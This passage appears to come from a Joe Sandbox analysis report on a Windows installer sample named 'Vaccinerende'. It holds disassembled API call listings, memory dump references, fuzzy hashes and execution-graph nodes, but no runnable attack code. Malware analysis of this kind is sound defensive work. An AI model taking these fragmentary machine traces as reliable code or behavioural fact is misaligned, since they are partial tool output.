                                                                              • CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017D5
                                                                                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                                • Part of subcall function 004052B0: lstrcatW.KERNEL32(004226C8,00403233,00403233,004226C8,00000000,?,00403094), ref: 0040530B
                                                                                • Part of subcall function 004052B0: SetWindowTextW.USER32(004226C8,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                              • String ID:
                                                                              • API String ID: 1941528284-0
                                                                              • Opcode ID: 47ce6a9d9fbc71e10f5336432a93a05ba538ef86279b97ebc953335fde788606
                                                                              • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                                                              • Opcode Fuzzy Hash: 47ce6a9d9fbc71e10f5336432a93a05ba538ef86279b97ebc953335fde788606
                                                                              • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                                                              APIs
                                                                              • GetDC.USER32(?), ref: 00401DB6
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A,00000048), ref: 00401DD0
                                                                              • MulDiv.KERNEL32 ref: 00401DD8
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                              • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                              • String ID:
                                                                              • API String ID: 3808545654-0
                                                                              • Opcode ID: bc375dde46825d3f1d903fa7ab5296d8f4650d21e22a6159151442d341355b9e
                                                                              • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                                                              • Opcode Fuzzy Hash: bc375dde46825d3f1d903fa7ab5296d8f4650d21e22a6159151442d341355b9e
                                                                              • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                              • LoadImageW.USER32 ref: 00401D8B
                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                              • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                                                              • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                                                              • Opcode Fuzzy Hash: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                                                              • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                                                              • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                                                              APIs
                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                               • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Close$Enum
                                                                              • String ID:
                                                                              • API String ID: 464197530-0
                                                                              • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                                                              • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                                                              APIs
                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057C2
                                                                              • GetLastError.KERNEL32 ref: 004057D6
                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                                                              • GetLastError.KERNEL32 ref: 004057F5
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                              • String ID:
                                                                              • API String ID: 3449924974-0
                                                                              • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                                                              • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                                                              APIs
                                                                              • DestroyWindow.USER32 ref: 00402E70
                                                                              • GetTickCount.KERNEL32(00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E8E
                                                                              • CreateDialogParamW.USER32 ref: 00402EAB
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402EB9
                                                                              Similarity
                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                              • String ID:
                                                                              • API String ID: 2102729457-0
                                                                              • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                              • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                                                              • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                              • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00405253
                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                                                                • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                              • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                                                              • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                              • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(00437800,00437800,?,?,00435000,0040333B,00437000,00437800,00437800,00437800,00437800,00437800,7570D4C4,00403589,?,00000006), ref: 00405D8B
                                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,0040333B,00437000,00437800,00437800,00437800,00437800,00437800,7570D4C4,00403589), ref: 00405DA6
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: nsa
                                                                              • API String ID: 1716503409-2209301699
                                                                              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                                                              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                              • CloseHandle.KERNEL32(?), ref: 00405867
                                                                              Strings
                                                                              • Error launching installer, xrefs: 00405844
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
                                                                              • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                                                              • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                                                              • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                                                              • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                                                              • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                                                              • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                                                              • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                              • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                                                              • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                              • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                              • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                                                              • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                              • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                                                                              • CharNextA.USER32(00000000), ref: 00405CDC
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                              • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                              • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8

Execution Graph

Execution Coverage: 5.4%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 3.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 70
??2@YAPAXI 38521->38523 38524 40e921 ??3@YAXPAX 38521->38524 38525 40e92a ??3@YAXPAX 38521->38525 38522->38521 38523->38507 38524->38525 38525->38523 38527 40aa04 free 38526->38527 38528 40ea88 38527->38528 38529 40aa04 free 38528->38529 38530 40ea90 38529->38530 38531 40aa04 free 38530->38531 38532 40ea98 38531->38532 38533 40aa04 free 38532->38533 38534 40eaa0 38533->38534 38535 40a9ce 4 API calls 38534->38535 38536 40eab3 38535->38536 38537 40a9ce 4 API calls 38536->38537 38538 40eabd 38537->38538 38539 40a9ce 4 API calls 38538->38539 38540 40eac7 38539->38540 38541 40a9ce 4 API calls 38540->38541 38542 40ead1 38541->38542 38542->38515 38543->38475 38544->38479 38602 40b2cc 38545->38602 38547 402b0a 38548 40b2cc 27 API calls 38547->38548 38549 402b23 38548->38549 38550 40b2cc 27 API calls 38549->38550 38551 402b3a 38550->38551 38552 40b2cc 27 API calls 38551->38552 38553 402b54 38552->38553 38554 40b2cc 27 API calls 38553->38554 38555 402b6b 38554->38555 38556 40b2cc 27 API calls 38555->38556 38557 402b82 38556->38557 38558 40b2cc 27 API calls 38557->38558 38559 402b99 38558->38559 38560 40b2cc 27 API calls 38559->38560 38561 402bb0 38560->38561 38562 40b2cc 27 API calls 38561->38562 38563 402bc7 38562->38563 38564 40b2cc 27 API calls 38563->38564 38565 402bde 38564->38565 38566 40b2cc 27 API calls 38565->38566 38567 402bf5 38566->38567 38568 40b2cc 27 API calls 38567->38568 38569 402c0c 38568->38569 38570 40b2cc 27 API calls 38569->38570 38571 402c23 38570->38571 38572 40b2cc 27 API calls 38571->38572 38573 402c3a 38572->38573 38574 40b2cc 27 API calls 38573->38574 38575 402c51 38574->38575 38576 40b2cc 27 API calls 38575->38576 38577 402c68 38576->38577 38578 40b2cc 27 API calls 38577->38578 38579 402c7f 38578->38579 38580 40b2cc 27 API calls 38579->38580 38581 402c99 38580->38581 38582 40b2cc 27 API calls 38581->38582 38583 402cb3 38582->38583 38584 40b2cc 27 API calls 38583->38584 38585 402cd5 38584->38585 38586 40b2cc 27 API calls 38585->38586 38587 402cf0 
38586->38587 38588 40b2cc 27 API calls 38587->38588 38589 402d0b 38588->38589 38590 40b2cc 27 API calls 38589->38590 38591 402d26 38590->38591 38592 40b2cc 27 API calls 38591->38592 38593 402d3e 38592->38593 38594 40b2cc 27 API calls 38593->38594 38595 402d59 38594->38595 38596 40b2cc 27 API calls 38595->38596 38597 402d78 38596->38597 38598 40b2cc 27 API calls 38597->38598 38599 402d93 38598->38599 38600 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38599->38600 38600->38483 38601->38473 38605 40b58d 38602->38605 38604 40b2d1 38604->38547 38606 40b5a4 GetModuleHandleW FindResourceW 38605->38606 38607 40b62e 38605->38607 38608 40b5c2 LoadResource 38606->38608 38610 40b5e7 38606->38610 38607->38604 38609 40b5d0 SizeofResource LockResource 38608->38609 38608->38610 38609->38610 38610->38607 38618 40afcf 38610->38618 38612 40b608 memcpy 38621 40b4d3 memcpy 38612->38621 38614 40b61e 38622 40b3c1 18 API calls 38614->38622 38616 40b626 38623 40b04b 38616->38623 38619 40b04b ??3@YAXPAX 38618->38619 38620 40afd7 ??2@YAPAXI 38619->38620 38620->38612 38621->38614 38622->38616 38624 40b051 ??3@YAXPAX 38623->38624 38625 40b05f 38623->38625 38624->38625 38625->38607 38626->38491 38628 444a64 FreeLibrary 38627->38628 38629 444a83 38627->38629 38628->38629 38629->38493 38631 4032c4 38630->38631 38632 40b633 free 38631->38632 38633 403316 38632->38633 38649 44553b 38633->38649 38637 403480 38847 40368c 15 API calls 38637->38847 38639 403489 38640 40b633 free 38639->38640 38642 403495 38640->38642 38641 40333c 38641->38637 38643 4033a9 memset memcpy 38641->38643 38644 4033ec wcscmp 38641->38644 38845 4028e7 11 API calls 38641->38845 38846 40f508 6 API calls 38641->38846 38642->38493 38643->38641 38643->38644 38644->38641 38647 403421 _wcsicmp 38647->38641 38648->38494 38650 445548 38649->38650 38651 445599 38650->38651 38848 40c768 38650->38848 38653 4455a8 memset 38651->38653 38660 4457f2 38651->38660 38932 403988 38653->38932 38659 4458aa 
38662 4458bb memset memset 38659->38662 38742 44594a 38659->38742 38668 445854 38660->38668 39035 403e2d memset memset memset memset memset 38660->39035 38661 445672 38943 403fbe memset memset memset memset memset 38661->38943 38666 414c2e 17 API calls 38662->38666 38664 44595e memset memset 38670 414c2e 17 API calls 38664->38670 38665 4455e5 38665->38661 38678 44560f 38665->38678 38671 4458f9 38666->38671 38667 44557a 38672 44558c 38667->38672 38912 4136c0 38667->38912 38668->38659 39058 403c9c memset memset memset memset memset 38668->39058 38676 44599c 38670->38676 38677 40b2cc 27 API calls 38671->38677 38916 444b06 38672->38916 38674 445823 38722 4087b3 338 API calls 38674->38722 38743 445849 38674->38743 38675 445a00 memset memset 38684 414c2e 17 API calls 38675->38684 38687 40b2cc 27 API calls 38676->38687 38688 445909 38677->38688 38691 4087b3 338 API calls 38678->38691 38680 445879 38726 4087b3 338 API calls 38680->38726 38746 44589f 38680->38746 38681 445b38 memset memset memset 38693 445bd4 38681->38693 38694 445b98 38681->38694 38685 445a3e 38684->38685 38701 40b2cc 27 API calls 38685->38701 38696 4459ac 38687->38696 38705 409d1f 6 API calls 38688->38705 38689 445cf0 38704 403335 38689->38704 38713 445d88 memset memset memset 38689->38713 38731 445d3d 38689->38731 38690 445c8b memset memset 38697 414c2e 17 API calls 38690->38697 38706 445621 38691->38706 39081 414c2e 38693->39081 38694->38693 38699 445ba2 38694->38699 38695 445680 38700 4456b2 38695->38700 38966 4087b3 memset 38695->38966 38707 409d1f 6 API calls 38696->38707 38708 445cc9 38697->38708 39219 4099c6 wcslen 38699->39219 39114 40b1ab free free 38700->39114 38710 445a4f 38701->38710 38844 4452e5 45 API calls 38704->38844 38714 445919 38705->38714 39112 4454bf 20 API calls 38706->39112 38716 4459bc 38707->38716 38717 409d1f 6 API calls 38708->38717 38719 409d1f 6 API calls 38710->38719 38715 414c2e 17 API calls 38713->38715 39128 409b98 GetFileAttributesW 38714->39128 38723 445dde 38715->38723 
